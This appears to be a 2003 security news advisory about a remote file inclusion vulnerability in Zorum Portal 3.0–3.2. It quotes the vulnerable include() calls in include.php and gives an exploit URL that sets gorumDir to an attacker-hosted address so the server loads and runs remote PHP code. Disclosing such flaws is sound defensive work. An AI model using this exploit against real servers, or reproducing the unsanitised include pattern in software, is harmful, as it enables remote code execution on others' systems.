Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Zorum Portal (PHP) vulnerability

Zorum Portal (PHP) vulnerability

by Nikola Strahija on January 22nd, 2003 There is vulnerability in Zorum Poral Version : 3.0;3.1;3.2 .


Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
---------------------------------
include.php
---------------------------------

PHP Code:
---------------------------------
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
---------------------------------

--
[email protected]


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »